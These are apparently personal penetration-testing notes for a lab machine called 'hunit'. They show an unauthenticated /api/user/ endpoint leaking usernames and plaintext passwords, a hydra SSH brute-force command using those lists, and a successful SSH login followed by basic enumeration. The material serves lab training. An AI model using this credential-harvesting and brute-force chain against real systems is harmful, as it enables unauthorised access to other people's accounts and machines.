2 :8080

http://192.168.136.125:8080/
'my haikus'

# found posts on website
http://192.168.136.125:8080/article/a-poppy-blooms
http://192.168.136.125:8080/article/over-the-wintry
http://192.168.136.125:8080/article/lighting-one-candle
http://192.168.136.125:8080/article/the-taste-of-rain
http://192.168.136.125:8080/article/in-a-station-of-the-metro
http://192.168.136.125:8080/article/a-world-of-dew
http://192.168.136.125:8080/article/the-old-pond

# all view-source
<a href="http://localhost:8080/api/">List all</a>

# possible usernames
james
julie
jennifer
richard

http://192.168.136.125:8080/api/
[
  {
    "string": "/api/",
    "id": 13
  },
  {
    "string": "/article/",
    "id": 14
  },
  {
    "string": "/article/?",
    "id": 15
  },
  {
    "string": "/user/",
    "id": 16
  },
  {
    "string": "/user/?",
    "id": 17
  }
]

http://192.168.136.125:8080/api/article/
# returns json of all articles and posts on website
# contains user and password

http://192.168.136.125:8080/api/user/
# shows the same users info more clear
[{"login":"rjackson","password":"yYJcgYqszv4aGQ","firstname":"Richard","lastname":"Jackson","description":"Editor","id":1},
{"login":"jsanchez","password":"d52cQ1BzyNQycg","firstname":"Jennifer","lastname":"Sanchez","description":"Editor","id":3},
{"login":"dademola","password":"ExplainSlowQuest110","firstname":"Derik","lastname":"Ademola","description":"Admin","id":6},
{"login":"jwinters","password":"KTuGcSW6Zxwd0Q","firstname":"Julie","lastname":"Winters","description":"Editor","id":7},
{"login":"jvargas","password":"OuQ96hcgiM5o9w","firstname":"James","lastname":"Vargas","description":"Editor","id":10}]

# users
root
rjackson
jsanchez
dademola
jwinters
jvargas

# pass 
yYJcgYqszv4aGQ
d52cQ1BzyNQycg
ExplainSlowQuest110
KTuGcSW6Zxwd0Q
OuQ96hcgiM5o9w

# ssh brute force if any possible
$ hydra -L users -P pass ssh://192.168.136.125 -t 4 -s 43022

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-08 16:41:13
[DATA] max 4 tasks per 1 server, overall 4 tasks, 30 login tries (l:6/p:5), ~8 tries per task
[DATA] attacking ssh://192.168.136.125:43022/
[43022][ssh] host: 192.168.136.125   login: dademola   password: ExplainSlowQuest110
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-08 16:41:39

$ ssh dademola@192.168.136.125 -p 43022
dademola@192.168.136.125's password: ExplainSlowQuest110

[dademola@hunit ~]$ whoami;id;hostname;uname -a
dademola
uid=1001(dademola) gid=1001(dademola) groups=1001(dademola)
-bash: hostname: command not found
Linux hunit 5.9.4-arch1-1 #1 SMP PREEMPT Wed, 04 Nov 2020 21:41:09 +0000 x86_64 GNU/Linux
Previous3 box enum dademolaNext1 recon

Last updated